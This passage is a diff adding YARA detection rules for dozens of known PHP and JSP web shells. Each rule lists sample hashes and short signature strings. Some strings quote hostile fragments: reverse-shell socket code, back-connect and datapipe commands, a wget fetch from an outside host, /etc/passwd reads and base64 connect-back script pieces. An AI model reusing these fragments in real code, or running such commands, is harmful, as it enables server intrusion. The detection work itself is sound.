+rule webshell_wso2_5_1_wso2_5_wso2 {
+ meta:
+ description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+ hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+ hash2 = "cbc44fb78220958f81b739b493024688"
+ strings:
+ $s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+ $s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+ condition:
+ all of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "8b457934da3821ba58b06a113e0d53d9"
+ hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash4 = "655722eaa6c646437c8ae93daac46ae0"
+ hash5 = "9c94637f76e68487fa33f7b0030dd932"
+ strings:
+ $s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+ $s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+ condition:
+ all of them
+}
+rule webshell_404_data_suiyue {
+ meta:
+ description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "7066f4469c3ec20f4890535b5f299122"
+ hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+ hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+ strings:
+ $s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+ condition:
+ all of them
+}
+rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {
+ meta:
+ description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "ef43fef943e9df90ddb6257950b3538f"
+ hash1 = "ae025c886fbe7f9ed159f49593674832"
+ hash2 = "911195a9b7c010f61b66439d9048f400"
+ hash3 = "697dae78c040150daff7db751fc0c03c"
+ hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+ hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+ hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+ hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+ hash8 = "41af6fd253648885c7ad2ed524e0692d"
+ hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
+ strings:
+ $s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+ $s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+ $s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+ condition:
+ all of them
+}
+rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
+ meta:
+ description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+ hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+ hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+ hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+ hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+ hash5 = "d71716df5042880ef84427acee8b121e"
+ hash6 = "341298482cf90febebb8616426080d1d"
+ hash7 = "29aebe333d6332f0ebc2258def94d57e"
+ hash8 = "42654af68e5d4ea217e6ece5389eb302"
+ hash9 = "88fc87e7c58249a398efd5ceae636073"
+ hash10 = "4a812678308475c64132a9b56254edbc"
+ hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+ hash12 = "344f9073576a066142b2023629539ebd"
+ hash13 = "32dea47d9c13f9000c4c807561341bee"
+ hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+ hash15 = "6acc82544be056580c3a1caaa4999956"
+ hash16 = "6aa32a6392840e161a018f3907a86968"
+ hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+ hash18 = "3ea688e3439a1f56b16694667938316d"
+ hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+ hash20 = "71097537a91fac6b01f46f66ee2d7749"
+ hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+ hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
+ strings:
+ $s1 = "\"<h2>Remote Control »</h2><input class=\\\"bt\\\" onclick=\\\"var"
+ $s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+ $s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+ condition:
+ all of them
+}
+rule webshell_201_3_ma_download {
+ meta:
+ description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+ hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+ hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+ hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+ strings:
+ $s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+ $s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+ $s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+ condition:
+ all of them
+}
+rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
+ meta:
+ description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+ hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+ hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+ hash3 = "36331f2c81bad763528d0ae00edf55be"
+ hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+ hash5 = "8979594423b68489024447474d113894"
+ hash6 = "ec482fc969d182e5440521c913bab9bd"
+ hash7 = "f98d2b33cd777e160d1489afed96de39"
+ hash8 = "4b4c12b3002fad88ca6346a873855209"
+ hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+ hash10 = "e9a5280f77537e23da2545306f6a19ad"
+ hash11 = "598eef7544935cf2139d1eada4375bb5"
+ hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+ strings:
+ $s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+ $s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+ condition:
+ all of them
+}
+rule webshell_shell_phpspy_2006_arabicspy {
+ meta:
+ description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "791708057d8b429d91357d38edf43cc0"
+ hash1 = "40a1f840111996ff7200d18968e42cfe"
+ hash2 = "e0202adff532b28ef1ba206cf95962f2"
+ strings:
+ $s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+ $s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+ condition:
+ all of them
+}
+rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
+ meta:
+ description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+ hash1 = "8979594423b68489024447474d113894"
+ hash2 = "ec482fc969d182e5440521c913bab9bd"
+ hash3 = "f98d2b33cd777e160d1489afed96de39"
+ hash4 = "4b4c12b3002fad88ca6346a873855209"
+ hash5 = "e9a5280f77537e23da2545306f6a19ad"
+ strings:
+ $s4 = "sbFile.append(\" <a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+ $s9 = "sbFile.append(\" <a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+ condition:
+ all of them
+}
+rule webshell_2_520_icesword_job_ma1_ma4_2 {
+ meta:
+ description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "64a3bf9142b045b9062b204db39d4d57"
+ hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+ hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+ hash3 = "56c005690da2558690c4aa305a31ad37"
+ hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+ hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+ hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+ strings:
+ $s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+ $s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" /> <input typ"
+ $s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+ condition:
+ all of them
+}
+rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
+ meta:
+ description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+ hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+ hash2 = "0712e3dc262b4e1f98ed25760b206836"
+ strings:
+ $s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+ $s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+ $s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+ condition:
+ 2 of them
+}
+rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
+ meta:
+ description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "791708057d8b429d91357d38edf43cc0"
+ hash1 = "40a1f840111996ff7200d18968e42cfe"
+ hash2 = "e0202adff532b28ef1ba206cf95962f2"
+ hash3 = "802f5cae46d394b297482fd0c27cb2fc"
+ strings:
+ $s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+ condition:
+ all of them
+}
+rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
+ meta:
+ description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+ hash1 = "f2fa878de03732fbf5c86d656467ff50"
+ hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+ hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+ hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+ hash5 = "048ccc01b873b40d57ce25a4c56ea717"
+ strings:
+ $s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+ condition:
+ all of them
+}
+rule webshell_2008_2009lite_2009mssql {
+ meta:
+ description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+ hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+ hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+ strings:
+ $s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+ $s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+ condition:
+ all of them
+}
+rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
+ meta:
+ description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "791708057d8b429d91357d38edf43cc0"
+ hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+ hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+ hash3 = "40a1f840111996ff7200d18968e42cfe"
+ hash4 = "e0202adff532b28ef1ba206cf95962f2"
+ hash5 = "0712e3dc262b4e1f98ed25760b206836"
+ hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+ strings:
+ $s0 = "$mainpath_info = explode('/', $mainpath);" fullword
+ $s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+ condition:
+ all of them
+}
+rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
+ meta:
+ description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+ hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+ hash2 = "341298482cf90febebb8616426080d1d"
+ hash3 = "88fc87e7c58249a398efd5ceae636073"
+ hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+ strings:
+ $s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+ $s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), \"GBK\");" fullword
+ condition:
+ 1 of them
+}
+rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
+ meta:
+ description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+ hash1 = "f8a6d5306fb37414c5c772315a27832f"
+ hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
+ strings:
+ $s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+ $s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+ condition:
+ all of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_xxx {
+ meta:
+ description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "7066f4469c3ec20f4890535b5f299122"
+ hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+ hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+ hash3 = "8979594423b68489024447474d113894"
+ hash4 = "ec482fc969d182e5440521c913bab9bd"
+ hash5 = "f98d2b33cd777e160d1489afed96de39"
+ hash6 = "4b4c12b3002fad88ca6346a873855209"
+ hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+ hash8 = "e9a5280f77537e23da2545306f6a19ad"
+ strings:
+ $s4 = " <TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+ condition:
+ all of them
+}
+rule webshell_jsp_reverse_jsp_reverse_jspbd {
+ meta:
+ description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ super_rule = 1
+ hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+ hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+ hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
+ score = 50
+ strings:
+ $s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+ $s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+ $s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+ condition:
+ all of them
+}
+rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
+ meta:
+ description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "36331f2c81bad763528d0ae00edf55be"
+ hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+ hash2 = "8979594423b68489024447474d113894"
+ hash3 = "ec482fc969d182e5440521c913bab9bd"
+ hash4 = "f98d2b33cd777e160d1489afed96de39"
+ hash5 = "4b4c12b3002fad88ca6346a873855209"
+ hash6 = "e9a5280f77537e23da2545306f6a19ad"
+ hash7 = "598eef7544935cf2139d1eada4375bb5"
+ strings:
+ $s0 = "sbFolder.append(\"<tr><td > </td><td>\");" fullword
+ $s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+ $s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+ $s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+ condition:
+ 2 of them
+}
+rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
+ meta:
+ description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "64a3bf9142b045b9062b204db39d4d57"
+ hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+ hash2 = "56c005690da2558690c4aa305a31ad37"
+ hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+ hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+ hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+ hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+ strings:
+ $s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+ $s6 = "password = (String)session.getAttribute(\"password\");" fullword
+ $s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+ condition:
+ 2 of them
+}
+rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+ meta:
+ description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 60
+ super_rule = 1
+ hash0 = "791708057d8b429d91357d38edf43cc0"
+ hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+ hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+ hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+ hash4 = "40a1f840111996ff7200d18968e42cfe"
+ hash5 = "e0202adff532b28ef1ba206cf95962f2"
+ hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+ strings:
+ $s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+ $s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+ $s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+ $s9 = "$tabledump .= \" PRIMARY KEY ($colnames)\";" fullword
+ $fn = "filename: backup"
+ condition:
+ 2 of ($s*) and not $fn
+}
+rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
+ meta:
+ description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+ hash1 = "ef43fef943e9df90ddb6257950b3538f"
+ hash2 = "ae025c886fbe7f9ed159f49593674832"
+ hash3 = "911195a9b7c010f61b66439d9048f400"
+ hash4 = "697dae78c040150daff7db751fc0c03c"
+ hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+ hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+ hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+ hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+ hash9 = "41af6fd253648885c7ad2ed524e0692d"
+ hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
+ strings:
+ $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+ $s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+ condition:
+ all of them
+}
+rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
+ meta:
+ description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+ hash1 = "e2830d3286001d1455479849aacbbb38"
+ hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+ hash3 = "40c6ecf77253e805ace85f119fe1cebb"
+ strings:
+ $s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+ $s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+ $s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+ condition:
+ 2 of them
+}
+rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
+ meta:
+ description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "f2fa878de03732fbf5c86d656467ff50"
+ hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+ hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+ strings:
+ $s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+ $s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+ $s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+ $s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+ $s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+ condition:
+ 2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
+ meta:
+ description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+ hash1 = "f3ca29b7999643507081caab926e2e74"
+ hash2 = "527cf81f9272919bf872007e21c4bdda"
+ strings:
+ $s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+ $s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+ $s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+ $s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+ condition:
+ 2 of them
+}
+rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
+ meta:
+ description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+ hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+ hash2 = "9c34adbc8fd8d908cbb341734830f971"
+ hash3 = "f2fa878de03732fbf5c86d656467ff50"
+ hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+ hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+ hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+ hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+ hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+ hash9 = "048ccc01b873b40d57ce25a4c56ea717"
+ strings:
+ $s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+ $s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+ $s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+ $s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+ $s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+ $s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+ condition:
+ 2 of them
+}
+rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+ meta:
+ description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+ hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+ hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+ hash3 = "40a1f840111996ff7200d18968e42cfe"
+ hash4 = "e0202adff532b28ef1ba206cf95962f2"
+ hash5 = "802f5cae46d394b297482fd0c27cb2fc"
+ strings:
+ $s0 = "$this -> addFile($content, $filename);" fullword
+ $s3 = "function addFile($data, $name, $time = 0) {" fullword
+ $s8 = "function unix2DosTime($unixtime = 0) {" fullword
+ $s9 = "foreach($filelist as $filename){" fullword
+ condition:
+ all of them
+}
+rule webshell_c99_c66_c99_shadows_mod_c99shell {
+ meta:
+ description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+ hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+ hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+ hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+ strings:
+ $s2 = " if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+ $s3 = " \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+ $s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+ $s7 = " elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+ $s8 = " \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+ $s9 = " elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+ condition:
+ 2 of them
+}
+rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
+ meta:
+ description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+ hash1 = "d71716df5042880ef84427acee8b121e"
+ hash2 = "344f9073576a066142b2023629539ebd"
+ hash3 = "32dea47d9c13f9000c4c807561341bee"
